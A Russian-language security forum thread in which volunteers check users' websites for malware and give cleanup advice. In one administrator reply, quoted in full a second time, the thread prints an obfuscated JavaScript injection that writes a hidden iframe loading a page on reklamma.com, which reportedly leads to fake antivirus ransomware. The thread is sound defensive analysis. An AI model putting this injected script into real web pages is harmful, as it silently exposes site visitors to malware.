Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

akok

Команда форума
Администратор
Сообщения
17,687
Реакции
13,479
Баллы
2,203
  • Первое сообщение
  • #1
Нашим ресурсом оказываются услуги по проверке интернет ресурсов на наличие вредоносного кода.

Прошу учесть, что помощь оказывается добровольцами и поэтому не требуйте немедленной помощи. Вам обязательно окажут помощь.

Если вы хотите проверить сайт на вирусы, то выполните простые правила оформления запроса:
  1. Администрация имеет право отказать в проверке, в случае, если проверяемый ресурс нарушает законодательство или правила данного ресурса (варез, хакерская тематика, материалы порнографического характера).
  2. Никогда не публикуйте активных ссылок. (заменяйте http на хттп, например http://safezone.cc - нужно писать как хттп://safezone.cc)
  3. Не прикрепляйте файлы, которые предлагают вам скачать подозреваемые сайты. (Просто укажите имя файла, который пытается загрузится).
  4. Если Вы подозреваете, что после посещения подозрительного сайта Ваш компьютер подвергся заражению, то лучше выполнить правила оформления запроса.

*Мы не можем гарантировать 100% результат анализа. Слишком много факторов которых невозможно учесть.
 

Surok

Активный пользователь
Сообщения
2
Реакции
0
Баллы
391
Здравствуйте, Уважаемые!
Не могли бы вы проверить хттп://prizolov.ru/
У меня аваст на некоторые страницы ругается...
 

sergofun

Активный пользователь
Сообщения
17
Реакции
8
Баллы
393
Surok, а на какие именно?
 

akok

Команда форума
Администратор
Сообщения
17,687
Реакции
13,479
Баллы
2,203
Surok, пока ничего подозрительного не вижу. Можно скриншет с алертом и ссылку по которой происходит срабатывание антивируса.
 

Surok

Активный пользователь
Сообщения
2
Реакции
0
Баллы
391
akoK, Я всё скинула sergofun ... кажись нашли траблу)))
 

vicik_SH

Активный пользователь
Сообщения
2
Реакции
0
Баллы
391
Здравствуйте!
Проверьте плиз и мой сайт на вирус там скорей всего либо фрейм, скрипт или JS.
Вот сайт design-studio.at.ua

Заранее спс
 

akok

Команда форума
Администратор
Сообщения
17,687
Реакции
13,479
Баллы
2,203
vicik_SH, необходимо больше информации. Сейчас я не вижу вредоносного кода.

Полезные сылки по вашему ресурсу.
1
2

Вечером попробую провести более глубокий анализ с тестовой машины.
 

vicik_SH

Активный пользователь
Сообщения
2
Реакции
0
Баллы
391
А если я пришлю Вам по АСЕ или по мылу HTML шаблон чтоб Вы проверили его или нет в нём вредоносного скрипта или JS файла, ато хочу поменять Дизайн а тут такое.
P.S - Когда ставлю тот шаблон то слева шрифт нормальный а с правой стороны во всех блоках он чуток "жирный"
 

akok

Команда форума
Администратор
Сообщения
17,687
Реакции
13,479
Баллы
2,203
vicik_SH, хорошо.

akok<at>pisem.net с указанной ссылкой на тему. (at=@)

Добавлено через 2 часа 16 минут 47 секунд
vicik_SH, ответ отправил мылом.
 

LVM

Активный пользователь
Сообщения
3
Реакции
0
Баллы
391
Здравствуйте! проверьте пожалуйста на наличие вирусов ввв.fxstart-forum.org . Кажись там снова завелась зараза, которая редиректит на хттп://armadaneo.info/0/go.php?sid=2#post40889.
 
Последнее редактирование модератором:

akok

Команда форума
Администратор
Сообщения
17,687
Реакции
13,479
Баллы
2,203
LVM, мне не нравится архив.
хттп://fxstart-forum.org/archive/index.php
Там скрипт сидит
PHP:
function uDfWq(BLguro){ var eOIFsZRRj=new Function("qvGoIEnN", "return 469763;");var eOIFsZRRj=new Function("qvGoIEnN", "return 469763;"); fff=op.split("648"); } 
document['w192r141i175t159121e'.replace(/[0-9]/g,'')]('<div id=ATDOE style="visibility:hidden;display:none">%22%3Ciframe width%3D1 height%3D1 border%3D0 frameborder%3D0 src%3D%22http%3A%2F%2Freklamma.com%2Fnewspost%2Fin.php%22%3E%3C%2Fiframe%3E</div>');function ZiQGVsmqK(bVDxhu){  fff.op.replace("950"); fff=op.split("312"); } 
document['w146r196i113t188141e'.replace(/[0-9]/g,'')](unescape(document.getElementById('ATDOE').innerHTML));function SPnr(IpIxeMN){ var ZbRAlZGt = document.getElementById('aZCkvrZq');window.eval();window.eval(); } 
function kNVR(rMQ){ window.eval(); fff.op.replace("966");window.eval(); } 
function SBGfrfR(ngt){  fff=op.split("752"); fff.op.replace("498");var mKINvwDi = document.getElementById('MAprkE'); }

Который редиректит на
Код:
http://****mma.com/newspost/in.php
Где сидит редирект на
Код:
http://***.com/news/index.php
Где находится, нечто зашифрованное :)
И не допускается заходить по ссылке два раза... редиректит http://www.google.ru/

Добавлено через 1 минуту 38 секунд
По второй ссылке класический антивирус вымогатель (я так и не смог его запустить на тестовой машине).
 

LVM

Активный пользователь
Сообщения
3
Реакции
0
Баллы
391
LVM, мне не нравится архив.
хттп://fxstart-forum.org/archive/index.php
Там скрипт сидит
PHP:
function uDfWq(BLguro){ var eOIFsZRRj=new Function("qvGoIEnN", "return 469763;");var eOIFsZRRj=new Function("qvGoIEnN", "return 469763;"); fff=op.split("648"); } 
document['w192r141i175t159121e'.replace(/[0-9]/g,'')]('<div id=ATDOE style="visibility:hidden;display:none">%22%3Ciframe width%3D1 height%3D1 border%3D0 frameborder%3D0 src%3D%22http%3A%2F%2Freklamma.com%2Fnewspost%2Fin.php%22%3E%3C%2Fiframe%3E</div>');function ZiQGVsmqK(bVDxhu){  fff.op.replace("950"); fff=op.split("312"); } 
document['w146r196i113t188141e'.replace(/[0-9]/g,'')](unescape(document.getElementById('ATDOE').innerHTML));function SPnr(IpIxeMN){ var ZbRAlZGt = document.getElementById('aZCkvrZq');window.eval();window.eval(); } 
function kNVR(rMQ){ window.eval(); fff.op.replace("966");window.eval(); } 
function SBGfrfR(ngt){  fff=op.split("752"); fff.op.replace("498");var mKINvwDi = document.getElementById('MAprkE'); }

Который редиректит на
Код:
http://****mma.com/newspost/in.php
Где сидит редирект на
Код:
http://***.com/news/index.php
Где находится, нечто зашифрованное :)
И не допускается заходить по ссылке два раза... редиректит http://www.google.ru/

Добавлено через 1 минуту 38 секунд
По второй ссылке класический антивирус вымогатель (я так и не смог его запустить на тестовой машине).
Спасибо!!!
 

araan515

Активный пользователь
Сообщения
1
Реакции
0
Баллы
391
Здравствуйте, deleted спасибо!
 

akok

Команда форума
Администратор
Сообщения
17,687
Реакции
13,479
Баллы
2,203
araan515, это специально веб мастер столько порно набросал?

Добавлено через 1 минуту 38 секунд
Прошу простить, но у меня нет желания разбирать сайт с подобным рекламным контентом.

Спасибо за понимание.
 

posokhoff

Активный пользователь
Сообщения
2
Реакции
0
Баллы
391
Добрый день! Помогите вылечить сайт ввв.mebellina.com
Аваст ругается на JS Downloader EX, на HTML:Illframe...
Что делать??? ЗАРАНЕЕ СПАСИБО
 

akok

Команда форума
Администратор
Сообщения
17,687
Реакции
13,479
Баллы
2,203
В настоящее время сайт Mebellina.com находится в разработке.

posokhoff, остается поиск вставки "лишнего" кода в страницу. Антивирус Avast?
 

posokhoff

Активный пользователь
Сообщения
2
Реакции
0
Баллы
391
posokhoff, остается поиск вставки "лишнего" кода в страницу. Антивирус Avast?
Пришлось пока сменить главную страницу на сообщение о работах на сайте... Антивирус Аваст стоит. Вообще как лечатся сайты от вирусов? Какой-нибудь софт есть? Скрипты?
 

akok

Команда форума
Администратор
Сообщения
17,687
Реакции
13,479
Баллы
2,203
Подходы стандартны.

Проверки html страницы на наличия "вкраплений"

Проверка файлов на FTP и сравнение с исходниками.

Ну а в начале обязательно сменить пароль на FTP (и больше не хранить его в файл менеджерах)

Добавлено через 48 секунд
Антивирус Аваст стоит.
Иногда ругается на рекламу.
 

smartall

Активный пользователь
Сообщения
2
Реакции
0
Баллы
391
Проверьте плиз сайт нттп smartall.ru KIS 9.0 ругается на Exploit.Win32.Pidief.cvy. Если реально есть то объясните как решить проблему ! буду благодарен !
 

akok

Команда форума
Администратор
Сообщения
17,687
Реакции
13,479
Баллы
2,203
smartall, сейчас есть проблемы? На первый взгляд чисто.
 
Сверху Снизу